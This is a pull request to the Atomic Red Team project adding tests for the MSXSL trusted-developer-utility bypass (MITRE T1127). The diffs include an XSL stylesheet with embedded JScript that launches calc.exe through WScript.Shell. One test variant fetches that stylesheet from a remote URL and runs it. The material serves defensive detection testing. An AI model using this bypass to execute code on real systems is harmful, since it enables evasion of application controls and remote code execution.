### PR TITLE
MSXSL Bypass Test (T1127 Trusted Dev Utilities)

### DIFF
--- a/atomics/T1127/T1127.md
+++ b/atomics/T1127/T1127.md
@@ -58,6 +58,10 @@ Contributors: Casey Smith, Matthew Demaske, Adaptforward</blockquote>
 
 - [Atomic Test #1 - MSBuild Bypass Using Inline Tasks](#atomic-test-1---msbuild-bypass-using-inline-tasks)
 
+- [Atomic Test #2 - MSXSL Bypass using local files](#atomic-test-2---msxsl-bypass-using-local-files)
+
+- [Atomic Test #3 - MSXSL Bypass using remote files](#atomic-test-3---msxsl-bypass-using-remote-files)
+
 
 <br/>
 
@@ -75,5 +79,43 @@ Executes the code in a project file using. C# Example
 #### Run it with `command_prompt`!
 ```
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
+```
+<br/>
+<br/>
+
+## Atomic Test #2 - MSXSL Bypass using local files
+Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| xmlfile | Location of the test XML file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1127\src\msxsl-xmlfile.xml|
+| xslfile | Location of the test XSL script file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl|
+
+#### Run it with `command_prompt`!
+```
+C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
+```
+<br/>
+<br/>
+
+## Atomic Test #3 - MSXSL Bypass using remote files
+Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-xmlfile.xml|
+| xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-script.xsl|
+
+#### Run it with `command_prompt`!
+```
+C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
 ```
 <br/>

--- a/atomics/T1127/T1127.yaml
+++ b/atomics/T1127/T1127.yaml
@@ -17,20 +17,39 @@ atomic_tests:
     command: |
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
 
-- name: MSXSL Bypass
+- name: MSXSL Bypass using local files
   description: |
-    Executes the code specified within a XSL script tag during XSL transformation. Requires download of MSXSL from Microsoft.
+    Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
   supported_platforms:
     - windows
   input_arguments:
     xmlfile:
-      description: Location of the test XML file. May be a URL.
+      description: Location of the test XML file on the local filesystem.
       type: Path
       default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-xmlfile.xml
     xslfile:
-      description: Location of the test XSL script file. May be a URL.
+      description: Location of the test XSL script file on the local filesystem.
       type: Path
       default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl
+  executor:
+    name: command_prompt
+    command: |
+     C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
+
+- name: MSXSL Bypass using remote files
+  description: |
+    Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
+  supported_platforms:
+    - windows
+  input_arguments:
+    xmlfile:
+      description: Remote location (URL) of the test XML file.
+      type: Url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-xmlfile.xml
+    xslfile:
+      description: Remote location (URL) of the test XSL script file.
+      type: Url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-script.xsl
   executor:
     name: command_prompt
     command: |

--- a/atomics/T1127/T1127.yaml
+++ b/atomics/T1127/T1127.yaml
@@ -16,3 +16,22 @@ atomic_tests:
     name: command_prompt
     command: |
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
+
+- name: MSXSL Bypass
+  description: |
+    Executes the code specified within a XSL script tag during XSL transformation. Requires download of MSXSL from Microsoft.
+  supported_platforms:
+    - windows
+  input_arguments:
+    xmlfile:
+      description: Location of the test XML file. May be a URL.
+      type: Path
+      default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-xmlfile.xml
+    xslfile:
+      description: Location of the test XSL script file. May be a URL.
+      type: Path
+      default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl
+  executor:
+    name: command_prompt
+    command: |
+     C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}

--- a/atomics/T1127/src/msxsl-script.xsl
+++ b/atomics/T1127/src/msxsl-script.xsl
@@ -10,3 +10,4 @@ xmlns:user="http://mycompany.com/mynamespace">
 <xsl:template match="/">
    <xsl:value-of select="user:xml(.)"/>
 </xsl:template>
+</xsl:stylesheet>

--- a/atomics/T1127/src/msxsl-script.xsl
+++ b/atomics/T1127/src/msxsl-script.xsl
@@ -5,10 +5,7 @@ xmlns:msxsl="urn:schemas-microsoft-com:xslt"
 xmlns:user="http://mycompany.com/mynamespace">
  
 <msxsl:script language="JScript" implements-prefix="user">
-   function xml(nodelist) {
-var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c C:\Windows\System32\calc.exe");
-   return nodelist.nextNode().xml;
-   }
+    var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c C:\Windows\System32\calc.exe");
 </msxsl:script>
 <xsl:template match="/">
    <xsl:value-of select="user:xml(.)"/>

--- a/atomics/T1127/src/msxsl-script.xsl
+++ b/atomics/T1127/src/msxsl-script.xsl
@@ -5,7 +5,11 @@ xmlns:msxsl="urn:schemas-microsoft-com:xslt"
 xmlns:user="http://mycompany.com/mynamespace">
  
 <msxsl:script language="JScript" implements-prefix="user">
-    var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c C:\Windows\System32\calc.exe");
+   function xml(nodelist) {
+var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+   return nodelist.nextNode().xml;
+ 
+   }
 </msxsl:script>
 <xsl:template match="/">
    <xsl:value-of select="user:xml(.)"/>

--- a/atomics/T1127/src/msxsl-script.xsl
+++ b/atomics/T1127/src/msxsl-script.xsl
@@ -1,0 +1,15 @@
+<?xml version='1.0'?>
+<xsl:stylesheet version="1.0"
+xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+xmlns:msxsl="urn:schemas-microsoft-com:xslt"
+xmlns:user="http://mycompany.com/mynamespace">
+ 
+<msxsl:script language="JScript" implements-prefix="user">
+   function xml(nodelist) {
+var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c C:\Windows\System32\calc.exe");
+   return nodelist.nextNode().xml;
+   }
+</msxsl:script>
+<xsl:template match="/">
+   <xsl:value-of select="user:xml(.)"/>
+</xsl:template>

--- a/atomics/T1127/src/msxsl-xmlfile.xml
+++ b/atomics/T1127/src/msxsl-xmlfile.xml
@@ -1,0 +1,7 @@
+<?xml version="1.0"?>
+<?xml-stylesheet type="text/xsl" href="msxsl-script.xsl" ?>
+<customers>
+<customer>
+<name>Microsoft</name>
+</customer>
+</customers>

--- a/atomics/T1127/src/msxsl-xmlfile.xml
+++ b/atomics/T1127/src/msxsl-xmlfile.xml
@@ -2,6 +2,6 @@
 <?xml-stylesheet type="text/xsl" href="msxsl-script.xsl" ?>
 <customers>
 <customer>
-<name>Microsoft</name>
+<name>AtomicRedTeam</name>
 </customer>
 </customers>

--- a/atomics/index.md
+++ b/atomics/index.md
@@ -262,6 +262,8 @@
   - Atomic Test #3: Set a file's creation timestamp [linux, macos]
 - [T1127 Trusted Developer Utilities](./T1127/T1127.md)
   - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
+  - Atomic Test #2: MSXSL Bypass using local files [windows]
+  - Atomic Test #3: MSXSL Bypass using remote files [windows]
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 
@@ -495,6 +497,8 @@
   - Atomic Test #1: Trap [macos, centos, ubuntu, linux]
 - [T1127 Trusted Developer Utilities](./T1127/T1127.md)
   - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
+  - Atomic Test #2: MSXSL Bypass using local files [windows]
+  - Atomic Test #3: MSXSL Bypass using remote files [windows]
 - T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1047 Windows Management Instrumentation](./T1047/T1047.md)
   - Atomic Test #1: WMI Reconnaissance Users [windows]

--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -91,6 +91,8 @@
 - [T1099 Timestomp](./T1099/T1099.md)
 - [T1127 Trusted Developer Utilities](./T1127/T1127.md)
   - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
+  - Atomic Test #2: MSXSL Bypass using local files [windows]
+  - Atomic Test #3: MSXSL Bypass using remote files [windows]
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 
@@ -408,6 +410,8 @@
 - T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1127 Trusted Developer Utilities](./T1127/T1127.md)
   - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
+  - Atomic Test #2: MSXSL Bypass using local files [windows]
+  - Atomic Test #3: MSXSL Bypass using remote files [windows]
 - T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1047 Windows Management Instrumentation](./T1047/T1047.md)
   - Atomic Test #1: WMI Reconnaissance Users [windows]


### PR DESCRIPTION
**Details:**
Added MSXSL bypass test for existing Trusted Dev Utilities tests

**Testing:**
Manual testing on Win 7 performed. Validated via bin/validate-atomics.rb.

**Associated Issues:**
No associated issues (that I know of)